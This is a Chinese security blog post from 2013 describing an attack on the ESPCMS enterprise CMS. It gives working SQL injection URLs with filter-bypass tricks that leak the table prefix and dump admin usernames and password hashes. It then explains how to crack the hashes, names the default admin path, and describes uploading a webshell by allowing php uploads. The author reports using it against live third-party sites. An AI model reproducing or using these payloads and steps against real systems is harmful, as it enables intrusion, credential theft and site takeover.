阿峰博客 阿峰'S blog

  • 首页
  • 移动安全
    • Android安全
    • iOS安全
    • APP安全
  • 新闻资讯
    • IT新闻
    • 安全资讯
  • 信息安全
    • WEB安全
    • 系统安全
    • 终端安全
    • 安全工具
  • 建站优化
    • 网站优化
    • 网络营销
  • 资源共享
  • 关于博客
    • 申请友链
    • 在线投稿
不忘初心,砥砺前行。
  1. 首页
  2. 信息安全
  3. 正文

易思企业系统Espcms注入漏洞+后台拿shell

2013 年 3 月 10 日 7777点热度 0人点赞 0条评论

作者:阿峰

博客:www.afeng.org

今天下午看到seay发表一篇文章,【Espcms 通杀 SQL注入漏洞分析附EXP+拿下官网】
下载了他的exp,找了几个网站,都没有爆出来,成功率很低,如图

我就找他调侃了一会,
刚开始他也不知道是怎么回事,后来听他说知道了...不知道他是否更新了...

关于漏洞文件和细节我就不说了,根据他的注入语句我重新修改了一下。

爆前缀:

/index.php?ac=search&at=taglist&tagkey=%2527,tags) or did>1 and 97=ascii((seselectlect mid(username,1,1) frfromom espcms_admin_member limit 1)) limit 1– by afeng

有图有真相,先来测试一下espcms的官网吧,如图:

看到了吧,前缀是espcms...然后继续爆用户名和密码,无果。就去问了一下seay,他说官网已经修复了,好吧。
我们再来看看其他网站是如何的呢?

爆用户名和密码:

/index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,password)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

比如官方的前缀是espcms,那么在爆用户名和密码的时候,语句中的前缀二字要修改为espcms。
测试了三个站,成功率还是蛮高的,如图:

我高高兴兴的拿去破解md5,次噢,提示您输入的密文格式不对,我仔细数了数33位,
第一次见,给泼了一盆凉水...我对比了一下这三个MD5,我惊喜发现最后一位都是数字1,
果断删去最后1位,再解,提示收费,好吧,果断购买。

网站的账号和密码,咱都有了,该进行下一步了...

易思ESPCMS默认后台地址:/adminsoft/index.php

后台拿shell很简单,系统设置--图片功能设置--修改上传类型,添加php。

直接上传网马或者一句话,都可以...

提权就不说了...

标签: Espcms注入漏洞 易思企业系统漏洞
最后更新:2013 年 3 月 11 日

阿峰

保持饥渴的专注,追求最佳的品质

点赞
< 上一篇
下一篇 >

文章评论

取消回复

标签聚合
perl 端口扫描 xss漏洞 网络安全 渗透测试 工具 Wordpress 关键字
最新 热点 随机
最新 热点 随机
安卓批量搜索分析Java 类/对象结构脚本工具 MAC下在Genymotion模拟器中使用IDA动态调试android安卓应用 Joy:一款用于捕获和分析网络内部流量数据的工具 One-Lin3r:懒人的福音,渗透测试单行化工具 EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具 国产网站恶意代码监测(网马监控)工具优化版
MAC下在Genymotion模拟器中使用IDA动态调试android安卓应用安卓批量搜索分析Java 类/对象结构脚本工具
MAC下在Genymotion模拟器中使用IDA动态调试android安卓应用 硬盘数据恢复的神器有哪些? 分析勒索软件Cerber的攻击方法 国产SQL注入漏洞测试工具 – 超级SQL注入工具(SSQLInjection) 用perl抓取cookies 搞渗透测试思路很重要
最近评论
发布于 2 年前(07月07日) 小哥,可以帮忙把我的友链修改为 https://feifanblog.com 么?谢谢啦~
发布于 3 年前(07月23日) top.document.body.innerHTML=""; 这个是1.js 还是xss ...
发布于 3 年前(11月22日) 看错了,还以为是你买的register.com呢。。。
发布于 3 年前(10月22日) 大佬 求sql 放正系统注入工具
发布于 4 年前(05月27日) 感觉还是非常复杂的呢。。。。

COPYRIGHT © 2021 阿峰博客 阿峰'S blog. ALL RIGHTS RESERVED.

本站发布的内容仅限于学习和研究,请勿用于非法渗透和攻击,否则一切后果请自负;遵守法律法规,做一个合格的安全从业者。